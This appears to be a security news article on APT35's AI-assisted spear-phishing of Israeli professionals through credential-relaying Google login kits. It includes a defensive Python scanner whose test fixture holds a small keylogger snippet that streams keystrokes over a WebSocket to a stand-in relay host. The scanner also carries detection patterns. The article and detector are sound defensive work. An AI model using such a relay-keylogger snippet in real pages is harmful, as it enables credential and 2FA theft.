Iranian state-sponsored hackers, linked to the Islamic Revolutionary Guard Corps (IRGC) and tracked as APT35, have launched a new wave of spear-phishing attacks targeting journalists, cybersecurity experts, and computer science professors in Israel.
The attackers pose as fictitious assistants to technology executives or researchers, contacting their targets via email and WhatsApp.
Victims are directed to fake Gmail login pages or Google Meet invitations designed to harvest login credentials and two-factor authentication (2FA) codes as they are typed.
What Tactics and Tools Are Being Used in These Campaigns?
The group, which Check Point Research tracks as Educated Manticore, appears to use artificial intelligence to generate highly convincing messages, often referencing current geopolitical tensions to add urgency and credibility.
The phishing kits closely imitate real Google login pages: they prefill the victim's email address (so the page looks like a returning-user prompt) and are built with up-to-date web technologies, React-based single-page applications (SPA) with real-time WebSocket connections, so that each field the victim enters, including the 2FA code, is relayed to the operators immediately rather than on final submission.
The kits also include passive keyloggers, so whatever the victim typed is captured even if they abandon the form before submitting it.
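The indicators above (Google-branded sign-in content on a non-Google host, the address prefilled from the URL, a WebSocket opened from a login page, a keystroke listener) can be checked statically against a captured page. The following is an added example written for this page, not code from Check Point or from the kit itself; the indicator regexes, the allow-list of Google hosts and the sample pages are constructed assumptions, not recovered artefacts.

```python
"""Static indicator scan for a captured credential-phishing page of the kind
described above. Added example for this page; hostnames, regexes and the two
sample pages are constructed, not observed indicators."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Assumption: an allow-list a defender maintains of hosts where Google sign-in
# or Meet content is legitimate. Exact match, so a lookalike subdomain such as
# accounts.google.com.<attacker-domain> does not pass.
GOOGLE_HOSTS = {"accounts.google.com", "meet.google.com", "mail.google.com"}


@dataclass
class Finding:
    url: str
    indicators: list[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.indicators)


def _host(url: str) -> str:
    return (urlsplit(url).hostname or "").lower().rstrip(".")


def scan_page(url: str, html: str) -> Finding:
    """Return the independent indicators found in one page."""
    f = Finding(url)
    host = _host(url)
    if re.search(r"(?i)sign in.{0,20}google|google accounts|google meet", html) \
            and host not in GOOGLE_HOSTS:
        f.indicators.append("google-branded sign-in content on non-Google host")
    if host.startswith("xn--") or ".xn--" in host:
        f.indicators.append("punycode hostname (possible homoglyph lookalike)")
    if re.search(r"new\s+WebSocket\s*\(", html):
        f.indicators.append("WebSocket opened from login page (real-time relay)")
    if re.search(r"addEventListener\s*\(\s*['\"]key(down|up|press)['\"]", html):
        f.indicators.append("keystroke listener (passive keylogger)")
    # Prefill: the email control's value is set from the query string or hash.
    if re.search(r"URLSearchParams|location\.(search|hash)", html) and \
            re.search(r"(?i)(email|user|login)\W{0,10}\.value\s*=", html):
        f.indicators.append("email field prefilled from URL parameter")
    return f


def classify(url: str, html: str) -> str:
    """Two or more independent indicators together are treated as a phish."""
    return "likely-phish" if scan_page(url, html).score >= 2 else "no-verdict"


# Constructed sample: a kit page on a lookalike host with the victim's address
# carried in the query string (not a real observed URL).
PHISH_URL = "https://accounts.google.com.login-verify.example/signin?email=target%40gmail.com"
PHISH_HTML = """<html><head><title>Sign in - Google Accounts</title></head>
<body><div id="root"></div>
<script>
const params = new URLSearchParams(location.search);
document.getElementById('email').value = params.get('email');
const ws = new WebSocket('wss://relay.example/session');
document.addEventListener('keydown', e => ws.send(JSON.stringify({k: e.key})));
</script></body></html>"""

# Constructed sample: the genuine sign-in origin with no relay or logger.
BENIGN_URL = "https://accounts.google.com/signin/v2/identifier"
BENIGN_HTML = """<html><head><title>Sign in - Google Accounts</title></head>
<body><form id="view_container"><input type="email" name="identifier"></form>
</body></html>"""

if __name__ == "__main__":
    for u, h in ((PHISH_URL, PHISH_HTML), (BENIGN_URL, BENIGN_HTML)):
        r = scan_page(u, h)
        print(u, classify(u, h), r.indicators)
```

Each check is deliberately independent and weak on its own (plenty of legitimate SPAs open WebSockets); the verdict comes from the combination, which is what distinguishes a relay kit from an ordinary login page. A production version would fetch the page with a headless browser, since the React bundle usually arrives as a separate script rather than inline.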
Did you know?
APT35, also known as Charming Kitten and Phosphorus (Microsoft's former name for the group, now Mint Sandstorm), is one of the most active Iranian state-sponsored hacking groups, conducting long-term cyber espionage campaigns against government, defense, and critical infrastructure targets worldwide.
Why Is This Campaign Especially Dangerous?
The use of AI lets attackers craft messages without the grammatical errors that used to give phishing away and tailor them to individual targets, making detection harder. Because the phishing pages relay each field to the operators in real time, a one-time code from SMS or an authenticator app is captured and used before it expires, so conventional 2FA does not protect the account; only phishing-resistant methods such as FIDO2 security keys or passkeys, which are bound to the real login origin, resist this kind of relay. With credentials and a valid code, the attackers gain full access to the victim's account.
The rapid setup and takedown of phishing infrastructure make it challenging for defenders to track and disrupt these operations.
How Do These Attacks Fit into the Broader Geopolitical Context?
The campaign coincides with heightened tensions between Iran and Israel, with attacks intensifying after the outbreak of the Iran-Israel war in mid-June 2025.
APT35 has a long history of targeting Israeli professionals and institutions, using social engineering and custom malware to conduct cyber espionage and credential theft.
The group’s activities are part of a broader pattern of Iranian cyber operations targeting critical infrastructure, government, and private sector organizations in Israel and beyond.
What Are the Implications for Cybersecurity and Defense?
The persistence and sophistication of APT35's campaigns demonstrate the need for enhanced vigilance and advanced threat detection measures.
Organizations and individuals must remain alert to phishing attempts, move high-risk users to phishing-resistant authentication (security keys or passkeys rather than SMS or app-generated codes, which these kits relay), and conduct regular security awareness training that includes unsolicited contact over WhatsApp and meeting invitations, not only email.
The use of AI in phishing attacks is likely to increase, requiring continuous updates to defensive strategies and technologies.